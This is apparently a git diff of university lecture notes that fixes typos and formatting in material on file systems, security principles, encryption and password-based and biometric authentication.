* Sub-trees can be **traversed multiple times** - Sub-trees can be **traversed multiple times**
* Files have **multiple absolute file names** - Files have **multiple absolute file names**
* Deleting files becomes a lot more complicated - Deleting files becomes a lot more complicated
* Links may no longer point to a file - Links may no longer point to a file
* Inaccessible cycles may exist - Inaccessible cycles may exist
* A garbage collection scheme may be required to remove files that are no longer accessible from the file system tree. - A garbage collection scheme may be required to remove files that are no longer accessible from the file system tree.
#### Directory Implementations #### Directory Implementations
Directories contain a list of **human readable file names** that are mapped onto **unique identifiers** and **disk locations** Directories contain a list of **human-readable file names** that are mapped onto **unique identifiers** and **disk locations**
* They provide a mapping of the logical file onto the physical location - They provide a mapping of the logical file onto the physical location
Retrieving a file comes down to **searching the directory file** as fast as possible: Retrieving a file comes down to **searching the directory file** as fast as possible:
* A **simple random order of directory** entries might be insufficient (search time is linear as a function of the number of entries) - A **simple random order of directory** entries might be insufficient (search time is linear as a function of the number of entries)
* Indexes or **hash tables** can be used. - Indexes or **hash tables** can be used.
* They can store all **file related attributes** (file name, disk address - Windows) or they can **contain a pointer** to the data structure that contains the details of the file (Unix) - They can store all **file-related attributes** (file name, disk address - Windows) or they can **contain a pointer** to the data structure that contains the details of the file (Unix)
![directory files](assets/b2.png) ![directory files](assets/b2.png)
@@ -85,41 +85,41 @@ Retrieving a file comes down to **searching the directory file** as fast as poss
Similar to files, **directories** are manipulated using **system calls** Similar to files, **directories** are manipulated using **system calls**
* `create/delete`: new directory is created/deleted. - `create/delete`: new directory is created/deleted.
* `opendir, closeddir`: add/free directory to/from internal tables - `opendir, closeddir`: add/free directory to/from internal tables
* `readdir`: return the next entry in the directory file - `readdir`: return the next entry in the directory file
**Directories** are **special files** that **group files** together and of which the **structure is defined** by the **file system** **Directories** are **special files** that **group files** together and of which the **structure is defined** by the **file system**
* A bit is set to indicate that they are directories - A bit is set to indicate that they are directories
* In Linux when you create a directory, two files are in that directory that the user has no control over. These files are represented as `.` and `..` - In Linux when you create a directory, two files are in that directory that the user has no control over. These files are represented as `.` and `..`
* `.` - a file dealing with file permissions - `.` - a file dealing with file permissions
* `..` - represents the parent directory (`cd ..`) - `..` - represents the parent directory (`cd ..`)
##### Implementation ##### Implementation
> Regardless of the type of file system, a number of **additional considerations** need to be made > Regardless of the type of file system, a number of **additional considerations** need to be made
> >
> * **Disk Partitions**, **partition tables**, **boot sectors** etc > - **Disk Partitions**, **partition tables**, **boot sectors** etc
> * Free **space management** > - Free **space management**
> * System wide and per process **file tables** > - System-wide and per-process **file tables**
> >
> **Low level formatting** writes sectors to the disk > **Low-level formatting** writes sectors to the disk
> >
> **High level formatting** imposes a file system on top of this (using **blocks** that can cover multiple **sectors**) > **High-level formatting** imposes a file system on top of this (using **blocks** that can cover multiple **sectors**)
### Partitions ### Partitions
Disks are usually divided into **multiple partitions** Disks are usually divided into **multiple partitions**
* An independent file system may exist on each partiton - An independent file system may exist on each partition
**Master Boot Record** **Master Boot Record**
* Located as the start of the entire drive - Located at the start of the entire drive
* Used to boot the computer (BIOS reads and executes MBR) - Used to boot the computer (BIOS reads and executes MBR)
* Contains **partition table** at its end with **active partition**. - Contains **partition table** at its end with **active partition**.
* One partition is listed as **active** containing a boot block to load the operating system. - One partition is listed as **active** containing a boot block to load the operating system.
![master boot record](assets/b3.png) ![master boot record](assets/b3.png)
@@ -127,18 +127,18 @@ Disks are usually divided into **multiple partitions**
> The partition contains > The partition contains
> >
> * The partition **boot block**: > - The partition **boot block**:
> * Contains code to boot the OS > - Contains code to boot the OS
> * Every partition has a boot block - even if it does not contain an OS > - Every partition has a boot block - even if it does not contain an OS
> * **Super block** contains the partitions details e.g. partition size, number of blocks, I-node table etc > - **Super block** contains the partition's details, e.g. partition size, number of blocks and I-node table
> * **Free space management** contains a bitmap or linked list that indicates the free blocks. > - **Free space management** contains a bitmap or linked list that indicates the free blocks.
> * A linked list of disk blocks (also known as grouping) > - A linked list of disk blocks (also known as grouping)
> * We use free blocks to hold the **number of the free blocks**. Since the free list shrinks when the disk becomes full, this is not wasted space > - We use free blocks to hold the **number of the free blocks**. Since the free list shrinks when the disk becomes full, this is not wasted space
> * **Blocks are linked together**. The size of the list **grows with the size of the disk** and **shrinks with the size of the blocks** > - **Blocks are linked together**. The size of the list **grows with the size of the disk** and **shrinks with the size of the blocks**
> * Linked lists can be modified by **keeping track of the number of consecutive free blocks** for each entry (known as counting) > - Linked lists can be modified by **keeping track of the number of consecutive free blocks** for each entry (known as counting)
> * **I-Nodes**: An array of data structures, one per file, telling all about the files > - **I-Nodes**: An array of data structures, one per file, telling all about the files
> * **Root directory**: the top of the file-system tree > - **Root directory**: the top of the file-system tree
> * **Data**: files and directories > - **Data**: files and directories
![unix partition composition](assets/b4.png) ![unix partition composition](assets/b4.png)
@@ -148,26 +148,21 @@ Free space management with linked list (on the left) and bitmaps (on the right)
**Bitmaps** **Bitmaps**
* Require extra space - Require extra space
* Keeping it in main memory is possible but only for small disk - Keeping it in main memory is possible, but only for small disks
**Linked lists** **Linked lists**
* No wasted disk space - No wasted disk space
* We only need to keep in memory one block of pointers (load a new block when needed) - We only need to keep in memory one block of pointers (load a new block when needed)
Apart from the free space memory tables, there is a number of key data structures stored in memory: Apart from the free space memory tables, there are a number of key data structures stored in memory:
* An in-memory mount table (table with different partitions that have been mounted) - An in-memory mount table (table with different partitions that have been mounted)
* An in-memory directory cache of recently accessed directory information - An in-memory directory cache of recently accessed directory information
* A **system-wide open file table**, containing a copy of the FCB for every currently open file in the system, including location on disk, file size and **open count** (number of processes that use the file) - A **system-wide open file table**, containing a copy of the FCB for every currently open file in the system, including location on disk, file size and **open count** (number of processes that use the file)
* A **per-process open file table**, containing a pointer to the system open file table. - A **per-process open file table**, containing a pointer to the system open file table.
![file tables](assets/b6.png) ![file tables](assets/b6.png)
![opening & reading a file](assets/b7.png) ![opening & reading a file](assets/b7.png)
+24 -24
View File
@@ -19,22 +19,22 @@ Files will be composed of a number of blocks. Files are **sequential** or **rand
> >
> Allocation of free space can be done using **first fit, best fit, next fit**. > Allocation of free space can be done using **first fit, best fit, next fit**.
> >
> * However when files are removed, this can lead to external fragmentation. > - However when files are removed, this can lead to external fragmentation.
> >
> **Advantages** > **Advantages**
> >
> * **Simple** to implement - only location of the first block and the length of the file must be stored > - **Simple** to implement - only location of the first block and the length of the file must be stored
> * **Optimal read/write performance** - blocks are clustered in nearby sectors, hence the seek time (of the hard drive) is minimised > - **Optimal read/write performance** - blocks are clustered in nearby sectors, hence the seek time (of the hard drive) is minimised
> >
> **Disadvantages** > **Disadvantages**
> >
> * The **exact size** is not known before hand (what if the file size exceeds the initially allocated disk space) > - The **exact size** is not known beforehand (what if the file size exceeds the initially allocated disk space)
> * **Allocation algorithms** needed to decide which free blocks to allocate to a given file > - **Allocation algorithms** needed to decide which free blocks to allocate to a given file
> * Deleting a file results in **external fragmentation** > - Deleting a file results in **external fragmentation**
> >
> Contiguous allocation is still in use in **CD-ROMS & DVDs** > Contiguous allocation is still in use in **CD-ROMS & DVDs**
> >
> * External fragmentation isn't an issue here as files are written once. > - External fragmentation isn't an issue here as files are written once.
#### Linked List Allocation #### Linked List Allocation
@@ -42,45 +42,45 @@ To avoid external fragmentation, files are stored in **separate blocks** that ar
> Only the address of the first block has to be stored to locate a file > Only the address of the first block has to be stored to locate a file
> >
> * Each block contains a **data pointer** to the next block > - Each block contains a **data pointer** to the next block
> >
> **Advantages** > **Advantages**
> >
> * Easy to maintain (only the first block needs to be maintained in directory entry) > - Easy to maintain (only the first block needs to be maintained in directory entry)
> * File sizes can **grow and shrink dynamically** > - File sizes can **grow and shrink dynamically**
> * There is **no external fragmentation** - every possible block/sector is used (can be used) > - There is **no external fragmentation** - every possible block/sector is used (can be used)
> * Sequential access is straight forward - although **more seek operations** required > - Sequential access is straightforward - although **more seek operations** are required
> >
> **Disadvantages** > **Disadvantages**
> >
> * **Random access is very slow**, to retrieve a block in the middle, one has to walk through the list from the start > - **Random access is very slow**, to retrieve a block in the middle, one has to walk through the list from the start
> * There is some **internal fragmentation** - on average the last half of the block is left unused > - There is some **internal fragmentation** - on average the last half of the block is left unused
> * Internal fragmentation will reduce for **smaller block sizes** > - Internal fragmentation will reduce for **smaller block sizes**
> * However, **larger blocks** will be **faster** > - However, **larger blocks** will be **faster**
> * Space for data is lost within the blocks due to the pointer, the data in a **block is no longer a power of 2** > - Space for data is lost within the blocks due to the pointer. The data in a **block is no longer a power of 2**
> * **Diminished reliability**: if one block is corrupted/lost, access to the rest of the file is lost. > - **Diminished reliability**: if one block is corrupted/lost, access to the rest of the file is lost.
![Linked list file storage](assets/b8.png) ![Linked list file storage](assets/b8.png)
##### File Allocation Tables ##### File Allocation Tables
* Store the linked-list pointers in a **separate index table** called a **file allocation table** in memory. - Store the linked-list pointers in a **separate index table** called a **file allocation table** in memory.
![FAT](assets/b9.png) ![FAT](assets/b9.png)
> **Advantages** > **Advantages**
> >
> * **Block size remains power of 2** - no more space is lost to the pointer > - **Block size remains a power of 2** - no more space is lost to the pointer
> * **Index table** can be kept in memory allowing fast non-sequential access > - **Index table** can be kept in memory allowing fast non-sequential access
> >
> **Disadvantages** > **Disadvantages**
> >
> * The size of the file allocation table grows with the number of blocks, and hence the size of the disk > - The size of the file allocation table grows with the number of blocks, and hence the size of the disk
> * For a 200GB disk, with 1KB block size, 200 million entries are required, assuming that each entry at the table occupies 4 bytes, this required 800MB of main memory. > - For a 200 GB disk with a 1 KB block size, 200 million entries are required. Assuming that each entry in the table occupies 4 bytes, this requires 800 MB of main memory.
#### I-Nodes #### I-Nodes
Each file has a small data structure (on disk) called an **I-node** (index-node) that contains it's attributes and block pointers Each file has a small data structure (on disk) called an **I-node** (index-node) that contains its attributes and block pointers.
> In contrast to FAT, an I-node is **only loaded when a file is open** > In contrast to FAT, an I-node is **only loaded when a file is open**
> >
+49 -49
View File
@@ -14,20 +14,20 @@ Assets could be physical or virtual data
- Historically systems have been built to serve single users - Historically systems have been built to serve single users
- Often only a few highly trusted users were permitted to access a system - Often only a few highly trusted users were permitted to access a system
- This makes mistakes made by trusted users still a concern - This makes mistakes made by trusted users still a concern
- Current multi-user systems have completely different security concerns - Current multi-user systems have completely different security concerns
##### Modern Computer Security ##### Modern Computer Security
- Possibly thousands of users - Possibly thousands of users
- Distributed over wide networks - Distributed over wide networks
- Not all users are inherently trust worthy - Not all users are inherently trustworthy
- More and more things are moving to electronic - More and more things are moving to electronic
- Requiring protocols to manage them - Requiring protocols to manage them
### Attacks ### Attacks
- Monetary transaction need security - Monetary transactions need security
This is what most interactions look like and therefore attacks are based on this communication This is what most interactions look like and therefore attacks are based on this communication
@@ -45,13 +45,13 @@ What if the server gets hacked, we can use **hash functions**
###### Digital Certificates ###### Digital Certificates
However, this can be bypassed if the clients machine is hacked However, this can be bypassed if the client’s machine is hacked
We have to ensure the client is running anti virus software and practices good avoidance. We have to ensure the client is running antivirus software and practises good avoidance.
###### Insider attacks ###### Insider attacks
To stop this the company must practice good security such as: To stop this the company must practise good security such as:
- Database security Controls - Database security Controls
- File access controls - File access controls
@@ -72,31 +72,31 @@ It is often simply an arms race between developers & researchers and malicious u
- Within organisations, management are responsible for defining security needs - Within organisations, management are responsible for defining security needs
- Developers implement these policies - Developers implement these policies
- A concise document explaining the needs is called a *Security Policy* - A concise document explaining the needs is called a *Security Policy*
- What should be protected? - What should be protected?
- How should we protect it? - How should we protect it?
- UoN security policy - UoN security policy
- https://www.nottingham.ac.uk/dts/security/it-security.aspx - https://www.nottingham.ac.uk/dts/security/it-security.aspx
#### Computer Security #### Computer Security
- Usually defined as three keys areas (**CIA**) - Usually defined as three key areas (**CIA**)
1. Confidentiality 1. Confidentiality
- Prevention of unauthorised *disclosure* of information - Prevention of unauthorised *disclosure* of information
- This involves unauthorised users reading private or secret information - This involves unauthorised users reading private or secret information
- Medical records or credit card details - Medical records or credit card details
2. Integrity 2. Integrity
- Prevention of unauthorised *modification* of information - Prevention of unauthorised *modification* of information
- Also the assurance that data remains *unmodified* - Also the assurance that data remains *unmodified*
- Distributed bank transactions or database records - Distributed bank transactions or database records
- Just because we have **integrity**, doesn’t mean we have **authenticity** - Just because we have **integrity**, doesn’t mean we have **authenticity**
- Can we verify the sender? does it have freshness? - Can we verify the sender? does it have freshness?
- Authenticity = Intercity + Freshness - Authenticity = Integrity + Freshness
3. Availability 3. Availability
- Prevention of unauthorised *withholding* of information or resources - Prevention of unauthorised *withholding* of information or resources
- The property of being accessible is an usable upon demand by an authorised entity - The property of being accessible and usable upon demand by an authorised entity
- In other words prevent DoS attacks - In other words prevent DoS attacks
- e.g. redundant power supplies, firewall packet filtering - e.g. redundant power supplies, firewall packet filtering
#### Accountability #### Accountability
@@ -109,49 +109,49 @@ It is often simply an arms race between developers & researchers and malicious u
- Provides unforgeable evidence that someone did something - Provides unforgeable evidence that someone did something
- Mostly a legal concept - Mostly a legal concept
- Evidence verifiable by a trusted third party - Evidence verifiable by a trusted third party
- e.g notaries, digital certificates - e.g notaries, digital certificates
- Applies to physical security as well - Applies to physical security as well
- Like key cards - Like key cards
##### The security Dilemma ##### The security Dilemma
> “Security-unaware users have specific security requirements but no security expertise” > “Security-unaware users have specific security requirements but no security expertise”
- There is a trade off between security and ease of use - There is a trade-off between security and ease of use
- Increased resource demands - Increased resource demands
- Interferes with working patterns - Interferes with working patterns
###### Added complexity ###### Added complexity
- Often user experience is place at the forefront of software engineering - Often user experience is placed at the forefront of software engineering
- This is usually not compatible with security - This is usually not compatible with security
- Security can be seen as controlling access to information - Security can be seen as controlling access to information
- This is hard, we usually control access to data instead - This is hard, we usually control access to data instead
- Data - a means to represent information - Data - a means to represent information
- Information - an interpretation of that data - Information - an interpretation of that data
- Focusing on data can still leave information vulnerable - Focusing on data can still leave information vulnerable
- for example: Mikes criminal record not found - for example: Mike’s criminal record not found
- vs you do not have permission to access mikes criminal record - vs you do not have permission to access Mike’s criminal record
#### Security Design #### Security Design
- Computer Security is **not** rocket science if: - Computer Security is **not** rocket science if:
- Approached in a systematic, disciplined and well planned manner - Approached in a systematic, disciplined and well planned manner
- From the inception / design of a system - From the inception / design of a system
- However, if added as an afterthought, will often lead to disaster - However, if added as an afterthought, will often lead to disaster
- Good security design focuses on these principles - Good security design focuses on these principles
1. Focus of control 1. Focus of control
- In a given application, should the focus of protection mechanisms be: - In a given application, should the focus of protection mechanisms be:
- Data - permitted manipulation of data - Data - permitted manipulation of data
- consistency check - consistency check
- Operations - permitted invocations - Operations - permitted invocations
- Users - permissions for specific users - Users - permissions for specific users
2. Complexity vs assurance 2. Complexity vs assurance
- Would we prefer a simple approach with *high assurance*? or a feature rich environment - Would we prefer a simple approach with *high assurance*? or a feature rich environment
3. Centralised or decentralised controls 3. Centralised or decentralised controls
- Should defining and enforcing security be performed by central entity, or be left to individual components in a system - Should defining and enforcing security be performed by central entity, or be left to individual components in a system
- **Central entity** - possible bottleneck - **Central entity** - possible bottleneck
- **Distributed solution** - more efficient, but harder to manage - **Distributed solution** - more efficient, but harder to manage
4. Layered security 4. Layered security
- We can visualise our security model in layers - We can visualise our security model in layers
- Each layer protects a boundary, and relies on the security of the layers below - Each layer protects a boundary, and relies on the security of the layers below
@@ -17,14 +17,14 @@
- A statement of overall intent and commitment to security - A statement of overall intent and commitment to security
- Provides a *foundation* for other aspects - Provides a *foundation* for other aspects
- High level policy applies to the organisation and everyone in it - High level policy applies to the organisation and everyone in it
- more focused policies may apply to specific departments, systems etc - more focused policies may apply to specific departments, systems etc
- Identifies what but not how - Identifies what but not how
- the *how* part would be covered by accompanying guidelines - the *how* part would be covered by accompanying guidelines
#### Characteristics of a good policy #### Characteristics of a good policy
- Is short and backed from the top of the organisation - Is short and backed from the top of the organisation
- Ensure everyone reads it - Ensure everyone reads it
- Recognises that information is critical & must be protected - Recognises that information is critical & must be protected
- Emphasises the importance of security awareness & training - Emphasises the importance of security awareness & training
- Emphasises compliance with legal and regulatory requirements - Emphasises compliance with legal and regulatory requirements
@@ -39,7 +39,7 @@ Note the lack of policies on personally owned devices, considering ~100% of peop
**Removal** **Removal**
System is modified so that a particular feature, and the associated risk is removed. System is modified so that a particular feature and the associated risk are removed.
**Reduction** **Reduction**
@@ -51,7 +51,7 @@ Nothing is done - the risk is small and insignificant
**Relocation** **Relocation**
The system is unchanged, but risk is transferred to another party e.g. an insurance The system is unchanged, but risk is transferred to another party e.g. an insurer
###### Management need to know ###### Management need to know
@@ -63,25 +63,25 @@ The system is unchanged, but risk is transferred to another party e.g. an insura
### Baseline Security ### Baseline Security
- A minimum level of protection that should be considered by all organisations ulitilising IT systems - A minimum level of protection that should be considered by all organisations utilising IT systems
- Although many organisation will require protection considerably above baseline - Although many organisations will require protection considerably above baseline
- Can provide a *common* basis for mutual trust - Can provide a *common* basis for mutual trust
###### Cyber Essentials ###### Cyber Essentials
- Enables organisations to be certified independently for having met a good practice standard in cyber security - Enables organisations to be certified independently for having met a good practice standard in cyber security
- Addresses five technical control themes: - Addresses five technical control themes:
1. Firewalls 1. Firewalls
2. Secure configuration 2. Secure configuration
3. User access control 3. User access control
4. Malware protection 4. Malware protection
5. Security Update management 5. Security Update management
###### ISO 27001 ###### ISO 27001
- the central element of the ISO 27000 series - the central element of the ISO 27000 series
- describes best practice for an ISMS (information security management system) - describes best practice for an ISMS (information security management system)
- outlines of each aspect of an ISMS, and other standards provide further detail (e.g. 27002 for controls, 27003 for implementation, 27004 for evaluation) - outlines each aspect of an ISMS, and other standards provide further detail (e.g. 27002 for controls, 27003 for implementation, 27004 for evaluation)
###### ISO 27002 ###### ISO 27002
@@ -90,6 +90,6 @@ The system is unchanged, but risk is transferred to another party e.g. an insura
### The need for Professional Skills ### The need for Professional Skills
- Although simplified at the abstract level, actually following even the baseline controls is non-trivial - Although simplified at the abstract level, actually following even the baseline controls is non-trivial
- Simply knowing about them does not tell you *how* to comply - Simply knowing about them does not tell you *how* to comply
- Still requires the ability to assess the current environment and understand the appropriate protection and how to apply it - Still requires the ability to assess the current environment and understand the appropriate protection and how to apply it
- Organisations require professionals with appropriate security knowledge, skills and competence. - Organisations require professionals with appropriate security knowledge, skills and competence.
+18 -19
View File
@@ -2,8 +2,8 @@
- Symmetric encryption gives us confidentiality - Symmetric encryption gives us confidentiality
- Implemented using block ciphers or stream ciphers - Implemented using block ciphers or stream ciphers
- Lightweight and fast - Lightweight and fast
- Used for general communication - Used for general communication
![1644517237.png](img/1644517237.png) ![1644517237.png](img/1644517237.png)
@@ -12,7 +12,7 @@
- Stream ciphers use an initial seed key to generate an infinite keystream of random looking bits - Stream ciphers use an initial seed key to generate an infinite keystream of random looking bits
- The message and keystream are usually combined using an `xor` ($\oplus$) which is reversible if applied twice - The message and keystream are usually combined using an `xor` ($\oplus$) which is reversible if applied twice
- How ever using the same keystream to encrypt two messages makes messages easy to break - However, using the same keystream to encrypt two messages makes messages easy to break
- A random *number used once* nonce is added as an additional seed - A random *number used once* nonce is added as an additional seed
- The nonce is not a secret, it simply ensures the keystream is new - The nonce is not a secret, it simply ensures the keystream is new
@@ -33,7 +33,7 @@
#### Block Ciphers #### Block Ciphers
- Block ciphers use a key to encrypt a fixed size block of plain text into a *fixed-sized block* of cipher-text - Block ciphers use a key to encrypt a fixed size block of plain text into a *fixed-sized block* of cipher-text
- Changing and permuting the bits of the block depending on the key - Changing and permuting the bits of the block depending on the key
- Different lengths of messages can be handled by splitting the message up, and padding - Different lengths of messages can be handled by splitting the message up, and padding
##### SP-Network ##### SP-Network
@@ -68,28 +68,28 @@
### Attack Models ### Attack Models
1. Brute force 1. Brute force
- Weakest attack, guessing the key - Weakest attack, guessing the key
- If the key is $2^{128}$, on a super computer would take $10^9$ years - If the key is $2^{128}$, on a supercomputer it would take $10^9$ years
2. Cipher text only 2. Cipher text only
- Static analysis on the cipher text, frequency analysis etc - Static analysis on the cipher text, frequency analysis etc
- e.g. looking at the enginma machine and recognising a letter cannot be itself - e.g. looking at the Enigma machine and recognising a letter cannot be itself
3. Known plaintext 3. Known plaintext
- Where you know some plaintext and the corresponding ciphertext - Where you know some plaintext and the corresponding ciphertext
- e.g. Enigma being broken using “heil hitler” - e.g. Enigma being broken using “heil hitler”
4. Chosen plaintext 4. Chosen plaintext
- Seeing if certain plain-texts takes the algorithm longer/shorter - Seeing if certain plain-texts take the algorithm longer/shorter
5. Chosen ciphertext 5. Chosen ciphertext
6. Related-key attack 6. Related-key attack
- Get the same message encrypted in different keys - Get the same message encrypted in different keys
- More of a theoretical attack - More of a theoretical attack
Modern algorithms are expected to overcome these attacks trivially Modern algorithms are expected to overcome these attacks trivially
## Asymmetric Encryption ## Asymmetric Encryption
- Two keys, a public & private key - Two keys, a public & private key
- Public-key asymmetric cryptography hinges upon the premuse that: - Public-key asymmetric cryptography hinges upon the premise that:
- It is computationally infeasible to calculate a private key from a public key - It is computationally infeasible to calculate a private key from a public key
- In practice this is achieved through intractable mathematical problems - In practice this is achieved through intractable mathematical problems
#### Key Exchange #### Key Exchange
@@ -104,17 +104,16 @@ It is extremely easy to go from a -> A but extremely difficult to go backwards.
#### Public key Encryption #### Public key Encryption
- Client encrypts message with servers public key, now only the server’s private key can be used to read it. - Client encrypts message with the server’s public key; now only the server’s private key can be used to read it.
- The authenticity of signatures generated by the private key can be verified by the public key - The authenticity of signatures generated by the private key can be verified by the public key
![1644519300.png](img/1644519300.png) ![1644519300.png](img/1644519300.png)
##### Public key Algorithms ##### Public key Algorithms
| Algorithm | Key Exchange | Encryption | Digital Signitures | Mathematical Problem | Elliptic Curves | Typical Key Size | | Algorithm | Key Exchange | Encryption | Digital Signatures | Mathematical Problem | Elliptic Curves | Typical Key Size |
| :------------- | :----------: | :--------: | :----------------: | --------------------- | :-------------: | ---------------- | | :------------- | :----------: | :--------: | :----------------: | --------------------- | :-------------: | ---------------- |
| Diffie-Hellmen | ✅ | ❌ | ❌ | Discrete Logs | ✅ | 256 | | Diffie-Hellman | ✅ | ❌ | ❌ | Discrete Logs | ✅ | 256 |
| `RSA` | ❌ | ✅ | ✅ | Integer Factorisation | ❌ | 2048/4096 | | `RSA` | ❌ | ✅ | ✅ | Integer Factorisation | ❌ | 2048/4096 |
| `Elgamal` | ❌ | ✅ | ✅ | Discrete Logs | ✅ | 2048 | | `Elgamal` | ❌ | ✅ | ✅ | Discrete Logs | ✅ | 2048 |
| `DSA` | ❌ | ❌ | ✅ | Discrete Logs | ✅ | 256 | | `DSA` | ❌ | ❌ | ✅ | Discrete Logs | ✅ | 256 |
@@ -1,20 +1,20 @@
# Users and Authentication # Users and Authentication
- Users must be *identified* to enable: - Users must be *identified* to enable:
- User specific access controls - User specific access controls
- Individuals accountability for activities - Individuals’ accountability for activities
- Claimed identities must be authenticated - Claimed identities must be authenticated
- First line of system protection - First line of system protection
- Safeguards against abuse by external parties or unauthorised insiders - Safeguards against abuse by external parties or unauthorised insiders
##### Authentication Methods ##### Authentication Methods
1. Something the user *knows* 1. Something the user *knows*
- passwords, PINs - passwords, PINs
2. Something the user *has* 2. Something the user *has*
- a card, a token - a card, a token
3. Something the user *is* 3. Something the user *is*
- a bio-metric so a finger print or the users face - a biometric, so a fingerprint or the user’s face
#### Passwords #### Passwords
@@ -28,8 +28,8 @@ On one level they are very usable
Ease of use is often because users have not been made to use them properly Ease of use is often because users have not been made to use them properly
- Users make poor selections - Users make poor selections
- Dictionary words - Dictionary words
- things that people could guess or social engineer - things that people could guess or social engineer
- Use the same password on multiple systems - Use the same password on multiple systems
- Share them with other people - Share them with other people
- Write them down in discoverable places - Write them down in discoverable places
@@ -38,14 +38,14 @@ Ease of use is often because users have not been made to use them properly
#### Current Guidance on Password Systems #### Current Guidance on Password Systems
- The latest NIST recommendation advise: - The latest NIST recommendations advise:
- Against automatic password expiry - Against automatic password expiry
- Passwords should only be changed when there’s a reason - Passwords should only be changed when there’s a reason
- Against imposing rules for complex passwords - Against imposing rules for complex passwords
- Length matters more than complexity - Length matters more than complexity
- Against password hints or knowledge-based authentication - Against password hints or knowledge-based authentication
- Social media means these can be socially engineered - Social media means these can be socially engineered
- To enable “show password while typing” and to allow paste-in password fields - To enable “show password while typing” and to allow paste-in password fields
> Passwords are a **broken mechanism** > Passwords are a **broken mechanism**
> >
@@ -57,12 +57,12 @@ Browsers can now auto-generate passwords for us
- Avoids users making poor decisions - Avoids users making poor decisions
- But also avoids us - But also avoids us
- Knowing what the password is - Knowing what the password is
- Needing to know the good practice - Needing to know the good practice
Some devices may not support password entry Some devices may not support password entry
- For example dictating a password to an Alexa or google home - For example dictating a password to an Alexa or Google Home
- Mobile devices with small keyboards can be tricky - Mobile devices with small keyboards can be tricky
#### Token-based Authentication #### Token-based Authentication
@@ -75,23 +75,23 @@ Some devices may not support password entry
- Wearable devices - Wearable devices
- Smartphones - Smartphones
Often combined with a secret knowledge to form a 2-stage / 2-factor authentication Often combined with secret knowledge to form 2-stage / 2-factor authentication
- e.g. using an ATM requires card and pin - e.g. using an ATM requires card and pin
Smartphone apps can proveide the same functionality as authentication tokens (i.e. computing OTP) Smartphone apps can provide the same functionality as authentication tokens (i.e. computing OTP)
- The users no longer need a separate, dedicated device - The users no longer need a separate, dedicated device
- Think nationwide card reader for transfers - Think Nationwide card reader for transfers
- Relies on the security of the smartphone - Relies on the security of the smartphone
- User authentication on the device and or the app - User authentication on the device and or the app
- Prevention of compromise via attacks - Prevention of compromise via attacks
#### Biometrics #### Biometrics
- Theoretically far more usable - Theoretically far more usable
- Nothing for the user to remember - Nothing for the user to remember
- Nothing for them to lose or leave behind - Nothing for them to lose or leave behind
![1645038798.png](img/1645038798.png) ![1645038798.png](img/1645038798.png)
@@ -114,19 +114,19 @@ Biometrics can be copied, but not easily
###### Biometrics Errors ###### Biometrics Errors
- **F**alse **R**ejection **R**ate (**FRR**) - **F**alse **R**ejection **R**ate (**FRR**)
- Errors where the system falsely identifies the legitimate user as an imposter - Errors where the system falsely identifies the legitimate user as an imposter
- Also known as False Alarm Rate or Type I error - Also known as False Alarm Rate or Type I error
- **F**alse **A**cceptance **R**ate (**FAR**) - **F**alse **A**cceptance **R**ate (**FAR**)
- Errors where imposters are falsely believed to be legitimate users - Errors where imposters are falsely believed to be legitimate users
- Also known as Impostor Pass Rate or Type II error - Also known as Impostor Pass Rate or Type II error
- **E**qual **E**rror **R**ate (**EER**) - **E**qual **E**rror **R**ate (**EER**)
- The point at which FAR and FRR coincide - The point at which FAR and FRR coincide
- The measure normally used to assess biometric products - The measure normally used to assess biometric products
- Failure to Enroll - Failure to Enrol
- Errors in which the system is unable to establish as biometric template for a proposed user - Errors in which the system is unable to establish a biometric template for a proposed user
- e.g. some people don’t have finger prints, some reglions require face covering - e.g. some people don’t have fingerprints, some religions require face covering
- Failure to Acquire - Failure to Acquire
- Errors in which the system is unable to successfully acquire the information required to make a decision - Errors in which the system is unable to successfully acquire the information required to make a decision
A legitimate user’s experience of biometrics will be informed by: A legitimate user’s experience of biometrics will be informed by:
@@ -140,13 +140,13 @@ Developers focus can change on implementation. For example if being used as a pa
##### Modes of Use ##### Modes of Use
- **Verification** - **Verification**
- User claims an identity - authentication against that identity - User claims an identity - authentication against that identity
- One-to-one match (1:1) - One-to-one match (1:1)
- Less unique characteristics can be ultised - Less unique characteristics can be utilised
- **Identification** - **Identification**
- Users’ biometric sample is compared against all in database - Users’ biometric sample is compared against all in database
- One-to-Many match (1:N) - One-to-Many match (1:N)
- Only the more unique biometrics can be ultised - fingerprints, iris, retina etc - Only the more unique biometrics can be utilised - fingerprints, iris, retina etc
### 2-Factor Authentication ### 2-Factor Authentication
@@ -1,22 +1,22 @@
# Authentication # Authentication
- To allow some access to an asset we must ensure: - To allow some access to an asset we must ensure:
- They are permitted to access that asset - They are permitted to access that asset
- They are who they say they are - They are who they say they are
- We can attempt to verify identity using credentials - We can attempt to verify identity using credentials
- Something the user *is* - Something the user *is*
- Something the user *has* - Something the user *has*
- Something the user *knows* - Something the user *knows*
#### Usernames and Passwords #### Usernames and Passwords
- Identification - who are you - Identification - who are you
- Authentication - verify that identity - Authentication - verify that identity
- Authentication should expire - Authentication should expire
- *Remember my credentials* turns this into something you have - *Remember my credentials* turns this into something you have
- **T**ime **o**f **c**heck **t**o **t**ime **o**f **u**se - **TOCTTOU** - **T**ime **o**f **c**heck **t**o **t**ime **o**f **u**se - **TOCTTOU**
- Repeated authentication - Repeated authentication
- At the start and during a session - At the start and during a session
##### Problems with passwords ##### Problems with passwords
@@ -29,7 +29,7 @@
### Hash Functions ### Hash Functions
- Another crptographic primitive - Another cryptographic primitive
- Takes a message of any length, and returns a pseudorandom hash of fixed length - Takes a message of any length, and returns a pseudorandom hash of fixed length
$$ $$
@@ -57,10 +57,10 @@ For a hash function to be useful, we need it to have some important properties:
If database is breached, passwords are stored in plaintext If database is breached, passwords are stored in plaintext
- Storing passwords in plaintext is a terrible idea - Storing passwords in plaintext is a terrible idea
- Administrators can read them - Administrators can read them
- Storing encrypted passwords is better, but not perfect - Storing encrypted passwords is better, but not perfect
- Where are keys stored? - Where are keys stored?
- Administrators can read them - Administrators can read them
Using a **one-way hash function** is a much better solution Using a **one-way hash function** is a much better solution
@@ -69,49 +69,49 @@ Using a **one-way hash function** is a much better solution
#### Password & Shadow Files #### Password & Shadow Files
- Operating systems have taken steps to stop people reading hashes for offline attacks - Operating systems have taken steps to stop people reading hashes for offline attacks
- Linux stores hashes in a shadow file `/etc/shadow` - Linux stores hashes in a shadow file `/etc/shadow`
- These files are now **read-protected** - These files are now **read-protected**
#### Cracking Passwords #### Cracking Passwords
- Cracking a password isn’t always illegal - Cracking a password isn’t always illegal
- Password cracking falls into two basic types: - Password cracking falls into two basic types:
- Offline: you have a copy of the password hash locally - Offline: you have a copy of the password hash locally
